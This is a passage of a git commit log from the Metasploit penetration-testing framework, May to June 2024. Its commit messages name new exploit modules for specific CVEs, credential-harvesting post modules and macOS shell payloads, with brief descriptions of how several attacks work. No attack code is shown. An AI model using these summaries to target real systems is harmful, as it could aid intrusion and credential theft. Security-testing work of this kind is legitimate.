2024-06-13 13:16:13 +01:00
adfoster-r7
759f331071
Update docs ruby version
2024-06-13 13:10:26 +01:00
dwelch-r7
d31d282a73
Land #19256 , Fix warnings in acceptance tests
2024-06-13 11:20:22 +01:00
adfoster-r7
b48fbc6e00
Fix warnings in acceptance tests
2024-06-13 11:10:30 +01:00
sfewer-r7
7e37ca5d1a
add in link to AKB analysis
2024-06-13 10:22:33 +01:00
sfewer-r7
1d1c37bf44
add in documentation for options
2024-06-13 10:19:53 +01:00
Metasploit
f5aea8c11b
Bump version of framework to 6.4.14
2024-06-13 03:39:08 -05:00
Metasploit
d9bfcd464d
automatic module_metadata_base.json update
2024-06-12 17:59:03 -05:00
Jack Heysel
b9b638dd83
Land #19196 , Cacti import package RCE
...
This exploit module leverages an arbitrary file write vulnerability
(CVE-2024-25641) in Cacti versions prior to 1.2.27 to achieve RCE. It
abuses the Import Packages feature to upload a specially crafted package
that embeds a PHP file.
2024-06-12 15:43:46 -07:00
Metasploit
7031e0c7d7
automatic module_metadata_base.json update
2024-06-12 16:17:01 -05:00
bwatters
c768b1e1d4
Land #19243 , Add exploit for CVE-2024-1800 (Telerik Report Deserialization RCE)
...
Merge branch 'land-19243' into upstream-master
2024-06-12 15:59:07 -05:00
h00die-gr3y
4e26704d73
Update addressing cdelafuente-r7 comments
2024-06-12 18:57:29 +00:00
Christophe De La Fuente
45815a4cb5
Code review
2024-06-12 19:47:02 +02:00
sfewer-r7
835ff4453a
store loot as application/octet-stream if its not ASCII
2024-06-12 17:50:27 +01:00
sfewer-r7
7617a53993
add documentation
2024-06-12 17:45:11 +01:00
Zach Goldman
f3ad8a4737
Land #19225 , Add android link to issues template
2024-06-12 12:33:23 -04:00
Metasploit
e688226136
automatic module_metadata_base.json update
2024-06-12 11:07:22 -05:00
remmons-r7
a18dc69cbc
Remove ISO download link from documentation
...
Since Check Point has swapped out the download link on this page for a patched version, the link has been removed entirely.
2024-06-12 11:04:24 -05:00
Zach Goldman
f67526e248
Land #19223 , wp_ajax_load_more_file_upload.rb : Updated original author
2024-06-12 11:51:03 -04:00
sfewer-r7
043d3231a6
add the serv-u aux module
2024-06-12 16:25:09 +01:00
Spencer McIntyre
18fe758416
Finish up and document the deserialization RCE
2024-06-12 08:58:37 -04:00
Spencer McIntyre
cac5863e75
Update the exploit module to use the scanner
2024-06-12 08:58:37 -04:00
Spencer McIntyre
0e1e6c4fb2
Exploit improvements
...
* Delete the report the exploit creates
* Report credentials that are used to authenticate
* Use the specified username and password if provided
2024-06-12 08:58:37 -04:00
Spencer McIntyre
c120a30ba4
Enumerate and select a random category
2024-06-12 08:58:37 -04:00
Spencer McIntyre
b8d3cd6708
Initial module for CVE-2024-4358
2024-06-12 08:58:37 -04:00
softScheck
8a3262ae6c
junos_ssh_jail: style and formatting rubocop
2024-06-12 12:14:36 +02:00
Metasploit
949ce3e894
automatic module_metadata_base.json update
2024-06-11 17:03:55 -05:00
bwatters
5b4e3f009d
Land #19242 , Add exploit for CVE-2024-4358 (Telerik Report Server Auth Bypass)
...
Merge branch 'land-19242' into upstream-master
2024-06-11 16:47:12 -05:00
aaron
f49b9ea6cf
Corrected CVE in module file as well.
2024-06-11 17:35:39 -04:00
aaron
e1086e0aef
Corrected mistaken CVE-ID in exploit references.
2024-06-11 15:37:12 -04:00
Zach Goldman
a511729dce
add explicit error handling to base login scanner
2024-06-11 13:01:08 -05:00
Metasploit
13fc954381
automatic module_metadata_base.json update
2024-06-11 12:39:00 -05:00
bwatters
f2027784cf
Land #19240 , Rejetto HTTP File Server (HFS) 2.x - Unauthenticated RCE exploit module (CVE-2024-23692)
...
Merge branch 'land-19240' into upstream-master
2024-06-11 12:22:29 -05:00
Metasploit
adeefd3ffe
automatic module_metadata_base.json update
2024-06-11 10:54:10 -05:00
adfoster-r7
d07f64eb7f
Land #19239 , update Zoomeye module
2024-06-11 16:28:02 +01:00
Stephen Fewer
ab0079c0ee
Update modules/exploits/windows/http/rejetto_hfs_rce_cve_2024_23692.rb
...
improve documentation guidance to mention upgrading to a newer supported version (as 2.x is no longer supported)
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-06-11 16:26:04 +01:00
Stephen Fewer
2d63038196
Update documentation/modules/exploit/windows/http/rejetto_hfs_rce_cve_2024_23692.md
...
fix a typo in the documentation.
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-06-11 16:23:56 +01:00
Simon Janusz
f5a2c6b3d5
Land #19251 , Reintroduce windows acceptance tests
2024-06-11 13:06:07 +01:00
Metasploit
247642a516
automatic module_metadata_base.json update
2024-06-11 06:20:14 -05:00
cgranleese-r7
1077d4b0b0
Land #19191 , Support Ruby 3.4.0-preview1
2024-06-11 11:57:45 +01:00
e2002e
abb83fcdb6
fix several pages dork func.
2024-06-11 05:43:53 +02:00
Metasploit
14f88ce8ea
automatic module_metadata_base.json update
2024-06-10 16:58:09 -05:00
Jack Heysel
9bbb82ab55
Land #18998 , VSCode exploit for ipynb integration
...
VSCode allows users open a Jypiter notebook (.ipynb) file. Versions
v1.4.0 - v1.71.1 allow the Jypiter notebook to embed HTML and
javascript, which can then open new terminal windows within VSCode. Each
of these new windows can then execute arbitrary code at startup
2024-06-10 14:36:57 -07:00
sud0Ru
39b351554a
Update module to support ruby_smb3.3.9 and support DB connection
2024-06-10 15:05:08 -04:00
sud0Ru
5c7b3753f8
Change the module adn the documentation path
2024-06-10 15:03:22 -04:00
adfoster-r7
e10d8e20f2
Add support for Ruby 3.4.0-preview1
2024-06-10 19:36:34 +01:00
sfewer-r7
bf9b3f1d2a
add documentation
2024-06-10 17:41:55 +01:00
sfewer-r7
c6de00968f
typo
2024-06-10 17:17:39 +01:00
sfewer-r7
3a19a54c59
remove dead link
2024-06-10 17:17:28 +01:00
sud0Ru
88d325775b
Update documentation/modules/auxiliary/gather/nrpc_enumusers.md
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-06-10 18:43:01 +03:00
Jack Heysel
12b1936e16
Fixed typo added Options section docs
2024-06-10 07:39:24 -07:00
adfoster-r7
6498bfa6c6
Reintroduce windows acceptance tests
2024-06-10 13:07:35 +01:00
cgranleese-r7
bdeaa97cda
Land #19246 , Dry BUNDLER_WITHOUT config
2024-06-10 10:25:57 +01:00
h00die-gr3y
6a77c2e562
Final tweaks in check method
2024-06-08 11:33:55 +00:00
bwatters
2a271048ca
Land #19248 , Remove duplicated rescue
...
Merge branch 'land-19248' into upstream-master
2024-06-07 16:37:22 -05:00
h00die-gr3y
0e3471d543
Final draft
2024-06-07 19:47:06 +00:00
Spencer McIntyre
9f4c2f68c1
Land #19245 , Add dledda-r7 to the mailmap
2024-06-07 13:32:23 -04:00
Zach Goldman
82ca91b351
remove duplicated rescue
2024-06-07 12:18:07 -05:00
Spencer McIntyre
13a24d9f5c
Update the version extraction regex
2024-06-07 11:27:42 -04:00
adfoster-r7
b1381f54a1
Dry BUNDLER_WITHOUT config
2024-06-07 15:59:16 +01:00
sfewer-r7
998724f683
first commit for cve-2024-4577
2024-06-07 15:44:05 +01:00
sfewer-r7
e325d23526
first commit for cve-2024-4577
2024-06-07 15:43:40 +01:00
dledda-r7
cf18271dce
dledda-mailmap
2024-06-07 09:51:41 -04:00
h00die
b71bd1daad
Update azure.rb
2024-06-07 08:54:59 -04:00
h00die
6dffb3aed5
Update azure_spec.rb
2024-06-07 08:54:17 -04:00
h00die
99b3b607cc
Update azure_cli_creds.rb
2024-06-07 08:53:43 -04:00
Simon Janusz
9981a24a6c
Land #19235 , Fixes an issue where zip paths were not being created correctly for Java payloads
2024-06-07 12:45:44 +01:00
h00die-gr3y
55fa94995b
Updated check method
2024-06-06 22:23:35 +00:00
h00die
7594a4103c
moving azure_cli_files around and stubbing out content
...
Update azure lib with process_context_contents
Update azure_spec.rb
Update azure.rb
Update azure_spec.rb
Update azure_cli_creds.rb
fix lint warning
add function to print consolehost_history
print_consolehost_history spec updates
fixing azure_cli spec, and errors
2024-06-06 17:31:19 -04:00
Spencer McIntyre
d4696c0487
Document the auth bypass module
2024-06-06 15:48:25 -04:00
Spencer McIntyre
ba2732fa8a
Add the dedicated auth bypass module
2024-06-06 13:46:21 -04:00
softScheck
c7509d0a6c
junos_phprc: HttpClientTimeout as default
2024-06-06 19:27:59 +02:00
sfewer-r7
c8208704be
add in exploit module for CVE-2024-23692
2024-06-06 18:04:14 +01:00
Metasploit
cc9c104bc8
automatic module_metadata_base.json update
2024-06-06 10:27:23 -05:00
adfoster-r7
bf177642b4
Land #19199 , Improves UX for scanner/login modules
2024-06-06 16:03:17 +01:00
Simon Janusz
2fa1bc6b53
Land #19238 , Routine security updates
2024-06-06 15:49:21 +01:00
e2002e
1b1e215cd6
Merge branch 'rapid7:master' into master
2024-06-06 16:37:42 +02:00
softScheck GmbH
0c69968e4f
junos_phprc: removed commented out line
...
Co-authored-by: Simon Janusz <85949464+sjanusz-r7@users.noreply.github.com >
2024-06-06 16:03:35 +02:00
softScheck GmbH
769eb071cb
junos_phprc: use faker IPv4
...
Co-authored-by: Simon Janusz <85949464+sjanusz-r7@users.noreply.github.com >
2024-06-06 16:03:00 +02:00
adfoster-r7
aab1e5c029
Routine security updates
2024-06-06 13:46:22 +01:00
adfoster-r7
2d77609063
Land #19236 , bump rexml from 3.2.5 to 3.2.7 in /docs
2024-06-06 13:38:40 +01:00
dependabot[bot]
97e8e5ca02
Bump rexml from 3.2.5 to 3.2.7 in /docs
...
Bumps [rexml](https://github.com/ruby/rexml ) from 3.2.5 to 3.2.7.
- [Release notes](https://github.com/ruby/rexml/releases )
- [Changelog](https://github.com/ruby/rexml/blob/master/NEWS.md )
- [Commits](https://github.com/ruby/rexml/compare/v3.2.5...v3.2.7 )
---
updated-dependencies:
- dependency-name: rexml
dependency-type: direct:production
...
Signed-off-by: dependabot[bot] <support@github.com >
2024-06-06 12:30:23 +00:00
adfoster-r7
d604d28b27
Land #19197 , SQL sessions have correct history manager support
2024-06-06 12:53:30 +01:00
Metasploit
a9078b4d68
Bump version of framework to 6.4.13
2024-06-06 03:33:45 -05:00
Simon Janusz
b30641022f
Land #19227 , Moodle::Login.moodle_login: fix login success verification regex
2024-06-05 17:12:11 +01:00
cgranleese-r7
798d79ae32
Fixes an issue where zip paths were not being created correctly for Java payloads
2024-06-05 15:38:54 +01:00
e2002e
2a20894a27
Update zoomeye_search.rb
...
get rid of unnecessary includes
2024-06-05 15:53:50 +02:00
sjanusz-r7
adad32d442
Remove redundant 'require' for History Manager specs
2024-06-05 14:05:40 +01:00
Metasploit
ddaa21d8c3
automatic module_metadata_base.json update
2024-06-05 03:42:42 -05:00
Christophe De La Fuente
120fa0f2fe
Land #19208 , Add exploit module for CVE-2024-5084: WordPress Hash Form Plugin RCE
2024-06-05 10:17:02 +02:00
Christophe De La Fuente
67ec4baa66
PR-19208: Add DefaultTarget to the info hash
2024-06-05 10:14:48 +02:00
James Otten
e8571f23ed
Fix typo
2024-06-04 19:52:02 -04:00
James Otten
37f7e17fd0
Add osx support to post/multi/gather/azure_cli_creds
2024-06-04 19:52:02 -04:00
James Otten
222ceb83f7
Add module documentation for post/multi/gather/azure_cli_creds
2024-06-04 19:52:02 -04:00
James Otten
1cd1ae5049
Add new module post/multi/gather/azure_cli_creds
2024-06-04 19:52:02 -04:00
h00die
d7966104f2
touchup docs
2024-06-04 19:40:39 -04:00
Jack Heysel
9d47372fe6
rubocop
2024-06-03 15:43:25 -04:00
jheysel-r7
a8335478c7
Apply suggestions from code review
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-06-03 15:33:46 -04:00
softScheck
00ff617056
junos_phprc: session creation, old version switch, allow ssh root login, working timeouts
2024-06-03 18:33:06 +02:00
sjanusz-r7
91cb94e725
Add _close method to history manager, use generic method for Msf Config history file
2024-06-03 17:23:51 +01:00
adfoster-r7
36e29535a9
Land #19211 , update db manager to no longer default updated_at to created_at value
2024-06-03 13:19:21 +01:00
sjanusz-r7
cf97b36d98
Align importing timestamps method with msf_ prefix
2024-06-03 11:09:59 +01:00
cgranleese-r7
60e5393102
Updates login/scanner modules to make use of ReportSummary mixin
2024-06-03 11:02:15 +01:00
cgranleese-r7
48f89a2aad
Improves UX for scanner/login modules
2024-06-03 10:56:59 +01:00
sjanusz-r7
f7b69e2fe7
Fix service 'updated at' time not being updated correctly
2024-06-03 10:17:19 +01:00
e2002e
8f78c20f75
Update zoomeye_search.rb
2024-06-03 05:16:34 +02:00
bcoles
4eecb8ee96
Moodle::Login.moodle_login: fix login success verification regex
2024-06-03 01:49:04 +10:00
h00die
b28f174be8
Add android link to issues template
2024-06-02 11:28:18 -04:00
PizzaHat
c0e443e829
Update wp_ajax_load_more_file_upload.rb
...
Updated original author
2024-06-01 16:00:45 +02:00
remmons-r7
502cb565d6
Add CVE-2024-24919 markdown documentation
2024-05-31 14:33:45 -05:00
remmons-r7
7fdff871e4
Add Ruby module for CVE-2024-24919
2024-05-31 14:29:38 -05:00
Chocapikk
6b127249fa
Add suggestions
2024-05-31 20:56:03 +02:00
Metasploit
a92e37ecfb
automatic module_metadata_base.json update
2024-05-31 12:58:12 -05:00
cgranleese-r7
27f5602685
Land #18776 , Add osx aarch64 bind tcp payload
2024-05-31 18:28:24 +01:00
alanfoster
562e1dc453
Add osx aarch64 bind tcp payload
2024-05-31 18:21:24 +01:00
cgranleese-r7
4edb1e16ef
Land #18652 , Add osx aarch64 shell reverse tcp payload
2024-05-31 18:20:27 +01:00
alanfoster
7955381de5
Add osx aarch64 shell reverse tcp payload
2024-05-31 18:05:15 +01:00
cgranleese-r7
f2902b3efe
Land #18646 , Add osx aarch64 exec payload
2024-05-31 18:03:32 +01:00
alanfoster
dbeeadefc7
Add osx aarch64 exec payload
2024-05-31 17:51:38 +01:00
Metasploit
28e34531de
automatic module_metadata_base.json update
2024-05-31 09:36:46 -05:00
adfoster-r7
1281f4726f
Land #19209 , update fileformat modules to show the default template datastore values
2024-05-31 15:12:48 +01:00
adfoster-r7
3e75c42183
Land #19217 , fix tab completion crash on Ruby 3.2
2024-05-31 13:44:02 +01:00
Metasploit
ebfbd3d305
Bump version of framework to 6.4.12
2024-05-30 03:39:13 -05:00
Zach Goldman
2fb35f9700
adds eval patch to File
2024-05-29 15:04:21 -05:00
Jack Heysel
d8d1ea7ffb
Added on_new_session method
2024-05-29 16:04:00 -04:00
Metasploit
bf8f1f95f8
automatic module_metadata_base.json update
2024-05-29 11:01:08 -05:00
Jack Heysel
80ee458410
Land #19151 , Add Flowmon Priv Esc Feature Module
...
Privilege escalation module for Progress Flowmon unpatched feature
2024-05-29 11:35:53 -04:00
Zach Goldman
847b29178a
change nil guards to default values, nil or blank guards for certain datastore options
2024-05-29 09:34:58 -05:00
adfoster-r7
2158f48148
Land #19214 , Bump rexml from 3.2.6 to 3.2.8
2024-05-29 15:26:57 +01:00
Metasploit
4055d969ae
automatic module_metadata_base.json update
2024-05-29 07:53:24 -05:00
dependabot[bot]
2f5d9ec585
Bump rexml from 3.2.6 to 3.2.8
...
Bumps [rexml](https://github.com/ruby/rexml ) from 3.2.6 to 3.2.8.
- [Release notes](https://github.com/ruby/rexml/releases )
- [Changelog](https://github.com/ruby/rexml/blob/master/NEWS.md )
- [Commits](https://github.com/ruby/rexml/compare/v3.2.6...v3.2.8 )
---
updated-dependencies:
- dependency-name: rexml
dependency-type: indirect
...
Signed-off-by: dependabot[bot] <support@github.com >
2024-05-29 12:42:16 +00:00
Jack Heysel
cc7aeb4364
Fix module cleanup
2024-05-29 08:39:06 -04:00
Jack Heysel
72f332aba0
Land #19150 , Add Flowmon Command Injection Module
...
Unauthenticated Command Injection Module for Progress Flowmon
CVE-2024-2389
2024-05-29 08:28:37 -04:00
adfoster-r7
96396248f2
Land #19213 , Use latest Ruby 3.3 releases during tests
2024-05-29 13:06:56 +01:00
adfoster-r7
93953313b2
Use latest Ruby 3.3 releases during tests
2024-05-29 12:29:21 +01:00
cgranleese-r7
58b2fd25cc
Land #19200 , Update gemspec to use require relative
2024-05-29 12:23:15 +01:00
cgranleese-r7
0ac8957922
Land #19198 , Add support for Ruby 3.3.x
2024-05-29 12:22:32 +01:00
Jack Heysel
e57f4d3cb5
Change xml to html in get_html_document
2024-05-28 16:29:55 -04:00
Jack Heysel
5d2a6aa4a1
Updated authors
2024-05-28 16:03:56 -04:00
Jack Heysel
d60524d0b3
Started docs file
2024-05-28 15:54:47 -04:00
Jack Heysel
9955724f0a
Fixed check method, responded to comments
2024-05-28 15:54:28 -04:00
Chocapikk
4fdf6df1e7
Fix doc
2024-05-28 20:16:33 +02:00
Chocapikk
bea708d24c
Add exploit module for CVE-2024-5084: WordPress Hash Form Plugin RCE
2024-05-28 18:27:02 +02:00
sjanusz-r7
487faf9a1a
Allow History Manager writer thread to exit when queue is empty
2024-05-28 15:37:43 +01:00
sud0Ru
027d7ae423
Coreccting rubocop issues
2024-05-28 05:42:21 -04:00
sud0Ru
a4d08f3cc3
adding Doc for domain users enumeration module through ms-nrpc interface
2024-05-27 15:43:19 -04:00
sud0Ru
369db16a10
adding domain users enumeration module through ms-nrpc interface
2024-05-27 15:36:31 -04:00
Jack Heysel
d13ce0b1b8
rubocop fixes
2024-05-27 15:05:07 -04:00
h00die-gr3y
e7d65fe60a
Update based on bwatters-r7 comments
2024-05-27 17:45:07 +00:00
Jack Heysel
92b259981f
Added WRITEABLE_DIR datastore option plus minor improvements
2024-05-27 12:48:17 -04:00
Metasploit
12d59e0a3d
automatic module_metadata_base.json update
2024-05-27 04:53:04 -05:00
Christophe De La Fuente
f274c46bd2
Land #19103 , jasmin ransomware sqli and dir travers (CVE-2024-30851)
2024-05-27 11:23:42 +02:00
adfoster-r7
21bb4fc06f
Update gemspec to use require_relative
2024-05-24 00:31:40 +01:00
Jack Heysel
2c6fc11639
Responded to comments, clean up /etc/sudoers file
2024-05-23 16:56:35 -04:00
Jack Heysel
a0597007e4
Minor fixes, respond to comments
2024-05-23 14:02:28 -04:00
sjanusz-r7
82c43c3154
Allow HistoryManager to mock input library history
2024-05-23 17:50:19 +01:00
adfoster-r7
50a220b00f
Add support for Ruby 3.3.x
2024-05-23 15:55:45 +01:00
sjanusz-r7
60c09e5ca3
SQL sessions have correct history manager support
2024-05-23 13:57:31 +01:00
Christophe De La Fuente
06cb6aa713
Update cacti_pollers_sqli_rce to use the new library
...
- Update the CSRF token logic in the library
- Update cacti_package_import_rce and cacti_pollers_sqli_rce modules
- Update the FETCH_DELETE logic in cacti_package_import_rce to only
regenerate the payload when necessary
2024-05-23 11:30:48 +02:00
cgranleese-r7
d37a82500d
Land #19195 , Update nokogiri version
2024-05-23 10:21:06 +01:00
Metasploit
7eefa4b1ee
Bump version of framework to 6.4.11
2024-05-23 03:34:03 -05:00
Dave Yesland
1b55b6512f
Rubocop fixes
2024-05-22 12:43:27 -07:00
Christophe De La Fuente
c6c5f2bf7a
Add module, lib and documentation
2024-05-22 17:38:53 +02:00
dwelch-r7
7c908967fd
Land #19194 , Fix failing test with Ruby 3.4.0
2024-05-22 13:28:52 +01:00
adfoster-r7
0b0c5d10a8
Update nokogiri version
2024-05-22 13:06:31 +01:00
adfoster-r7
0695a6f2ce
Fix test failing with Ruby 3.4.0
2024-05-22 12:26:53 +01:00
Dave Yesland
b3bc4a6c68
Update progress_flowmon_sudo_privesc_2024.rb
2024-05-21 13:48:20 -07:00
Dave Yesland
de99a74540
Update modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
...
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com >
2024-05-21 13:45:36 -07:00
Dave Yesland
0de89d3b2d
Update documentation/modules/exploit/linux/local/progress_flowmon_sudo_privesc_2024.md
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-05-21 13:42:52 -07:00
Dave Yesland
5a60a9a3d9
Update modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-05-21 13:42:43 -07:00
Dave Yesland
a517a218ab
Update modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
...
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com >
2024-05-21 13:41:44 -07:00
Dave Yesland
90a0be67b6
Update modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-05-21 13:39:54 -07:00
Dave Yesland
1ddc60b185
Update modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-05-21 13:39:44 -07:00
h00die-gr3y
66a7fbf0ea
Update based on jvoisin comments
2024-05-21 20:21:35 +00:00
Metasploit
422acd3145
automatic module_metadata_base.json update
2024-05-21 14:15:48 -05:00
Jack Heysel
6e9e4a5aed
Land #19102 , Northstar C2 Stored XSS to Agent RCE
...
Add exploit module for CVE-2024-28741, Northstar C2 Stored XSS to Agent
RCE
2024-05-21 14:57:44 -04:00
Metasploit
0cd62c5864
automatic module_metadata_base.json update
2024-05-21 13:44:31 -05:00
Jack Heysel
10acd86390
Land #19071 , Add AVideo RCE module
...
Add module for CVE-2024-31819 which exploits an LFI in AVideo which uses
PHP Filter Chaining to turn the LFI into unauthenticated RCE
2024-05-21 14:27:15 -04:00
Metasploit
7a92eef81e
automatic module_metadata_base.json update
2024-05-21 08:03:03 -05:00
dwelch-r7
65f0672c62
Land #19192 , Fix crashing mipsle modules
2024-05-21 13:46:44 +01:00
adfoster-r7
6d2041b1cb
Fix crashing mipsle modules
2024-05-21 12:52:12 +01:00
Metasploit
c45f33eda4
automatic module_metadata_base.json update
2024-05-21 05:57:27 -05:00
cgranleese-r7
0c5a021ca7
Land #19189 , Update ruby version
2024-05-21 11:32:39 +01:00
cgranleese-r7
67154a12e0
Land #19104 , CHAOS rat xss to rce
2024-05-21 11:10:57 +01:00
adfoster-r7
c4e55f1493
Update ruby version
2024-05-20 17:55:10 +01:00
dwelch-r7
6301d840bb
Land #19190 , Disable pcaprb errors
2024-05-20 17:54:08 +01:00
adfoster-r7
73fdffbbc3
Disable pcaprb errors
2024-05-20 17:51:03 +01:00
adfoster-r7
40f7539ba0
Land #19186 , don't show regular option groups when viewing advanced options
2024-05-20 15:57:56 +01:00
h00die-gr3y
575e223657
Added documentation
2024-05-19 14:09:58 +00:00
h00die-gr3y
31babb6ca1
Fixed disclosure date
2024-05-19 12:23:21 +00:00
h00die-gr3y
6d844ae9c8
first release module
2024-05-19 12:16:14 +00:00
Metasploit
bbf096ee7e
automatic module_metadata_base.json update
2024-05-17 17:07:16 -05:00
bwatters
f8c69e434d
Land #19173 , Add CarotDAV FTP PackRat module
...
Merge branch 'land-19173' into upstream-master
2024-05-17 16:49:33 -05:00
Metasploit
9375102dbb
automatic module_metadata_base.json update
2024-05-17 11:04:56 -05:00
bwatters
8a68eebbf6
Land #19171 , Add Sylpheed Email PackRat module
...
Merge branch 'land-19171' into upstream-master
2024-05-17 10:39:56 -05:00
bwatters
20e083439c
Land #19169 , Add Adi IRC PackRat module
...
Merge branch 'land-19169' into upstream-master
2024-05-17 10:29:15 -05:00
The-Pink-Panther
9294d3bf5e
Added Adi IRC and Windows version to documentation scenarios
2024-05-17 09:59:20 -05:00
Jacob
175e16a29a
Removed unused regex search
...
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com >
2024-05-17 09:59:20 -05:00
Jacob
a8f1d35773
Re-structured artifact enumeration option
...
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com >
2024-05-17 09:59:20 -05:00
Jacob
704de79d73
Fixed documentation formatting
...
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com >
2024-05-17 09:59:20 -05:00
Jacob
7088b39ecd
Fixed rouge space
...
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com >
2024-05-17 09:59:20 -05:00
-Pink-Panther
3da09a0092
Added module documentation
2024-05-17 09:58:23 -05:00
-Pink-Panther
39630f1d2b
Added post module for Adi IRC Client
2024-05-17 09:58:23 -05:00
Dean Welch
ce49fa4e76
don't show regular option groups when viewing advanced options
2024-05-17 15:47:02 +01:00
Simon Janusz
28396ff23a
Land #19002 , Fix edgecase in Meterpreter job persistence
2024-05-17 14:22:51 +01:00
Metasploit
3a7574f3fc
automatic module_metadata_base.json update
2024-05-17 08:09:07 -05:00
adfoster-r7
25a1318052
Land #19170 , Refactor smb lookupsid module
2024-05-17 13:43:52 +01:00
Spencer McIntyre
638ad36b12
Fixed names that were missed while refactoring
2024-05-17 10:59:37 +01:00
sjanusz-r7
34ab7d97b2
Follow MS-LSAD and MS-LSAT spec for LSARPC & LookupSids
2024-05-17 10:59:37 +01:00
sjanusz-r7
138a553b36
Add support for configurable RPORT, session & default rports to lookupsid
2024-05-17 10:59:37 +01:00
sjanusz-r7
d569077564
Refactor smb_lookupsid module to use RubySMB
2024-05-17 10:59:37 +01:00
sjanusz-r7
b3799673ea
Bump ruby_smb to 3.3.8
2024-05-17 10:59:37 +01:00
Metasploit
056acd4d72
automatic module_metadata_base.json update
2024-05-16 19:35:53 -05:00
bwatters
d097ccfc7a
Land #19166 , Add Quassel IRC PackRat module
...
Merge branch 'land-19166' into upstream-master
2024-05-16 19:18:42 -05:00
The-Pink-Panther
c8ce9dc168
Added Quassel IRC and Windows version to documentation scenarios
2024-05-16 19:15:00 -05:00
Jacob
6de0048354
Removed unused regex search
...
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com >
2024-05-16 19:15:00 -05:00
Jacob
698895cf7d
Fixed rouge space
...
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com >
2024-05-16 19:15:00 -05:00
Jacob
7d8cd04086
Fixed documentation formatting
...
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com >
2024-05-16 19:15:00 -05:00
-Pink-Panther
41643073ee
Added module documentation
2024-05-16 19:12:54 -05:00
-Pink-Panther
d08247776c
Re-arranged Author list
2024-05-16 19:12:54 -05:00
-Pink-Panther
cf15b1f858
Added post module for Quassel IRC Client
2024-05-16 19:12:54 -05:00
Metasploit
df7d31434f
automatic module_metadata_base.json update
2024-05-16 17:25:08 -05:00
bwatters
d54b3920b2
Land #19165 , Add Halloy IRC PackRat module
...
Merge branch 'land-19165' into upstream-master
2024-05-16 16:59:47 -05:00
h00die
a89d418725
review of northstar c2
2024-05-16 15:17:28 -04:00
adfoster-r7
0bba494d1d
Fix edgecase in Meterpreter job persistence
2024-05-16 11:16:55 +01:00
Metasploit
e3fdfd6c71
Bump version of framework to 6.4.10
2024-05-16 03:39:08 -05:00
Chocapikk
da31761336
Lint
2024-05-15 22:13:53 +02:00
Valentin Lobstein
3900680a96
Update modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-05-15 22:07:45 +02:00
Valentin Lobstein
3560860e33
Update documentation/modules/exploit/multi/http/avideo_wwbnindex_unauth_rce.md
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-05-15 22:07:29 +02:00
Valentin Lobstein
c815c2b15c
Update modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-05-15 22:07:19 +02:00
Valentin Lobstein
7d2c06a246
Update modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-05-15 22:07:04 +02:00
Valentin Lobstein
cd10c2d208
Update modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-05-15 22:06:53 +02:00
adfoster-r7
306c66e12e
Land #19183 , Fix windows platform detection bug
2024-05-15 19:40:11 +01:00
Metasploit
a5e2196e70
automatic module_metadata_base.json update
2024-05-15 13:26:44 -05:00
adfoster-r7
1fa8256a6d
Fix windows platform detection bug
2024-05-15 19:17:40 +01:00
bwatters
f3a8b35060
Land #19058 , Add new Ldap session type
...
Merge branch 'land-19058' into upstream-master
2024-05-15 13:04:12 -05:00
Dean Welch
68f7334348
Fix kerberos auth and missing method error when querying with -a
2024-05-15 16:11:40 +01:00
Dean Welch
29c79fb499
Add handling of dead ldap sessions
2024-05-15 15:12:51 +01:00
Dean Welch
0cea2cba75
Add guard clause to not print out session info unless the session is enabled
2024-05-15 15:12:51 +01:00
Dean Welch
7cdea94000
Convert ldap modules to use the new ldap session type
2024-05-15 15:12:51 +01:00
Dean Welch
e693b9588c
Update ldap modules to support an ldap session
2024-05-15 15:12:51 +01:00
Dean Welch
55cb49c60e
Add back in useful base dn discovery print out
2024-05-15 15:12:51 +01:00
Dean Welch
df32ce2db9
Add ldap query support to the ldap session
2024-05-15 15:12:51 +01:00
Dean Welch
9e4f958af7
keep ldap connection open for use in a session
2024-05-15 15:12:51 +01:00
Dean Welch
3cedb20f75
Add initial ldap session support
2024-05-15 15:12:51 +01:00
The-Pink-Panther
22d16b91f2
Added Sylpheed and Windows version to documentation scenarios
2024-05-15 15:03:28 +01:00
Jacob
7a33970ef8
Re-structured artifact enumeration option
...
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com >
2024-05-15 14:58:51 +01:00
Jacob
e6669ea94a
Fixed documentation formatting
...
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com >
2024-05-15 14:58:40 +01:00
The-Pink-Panther
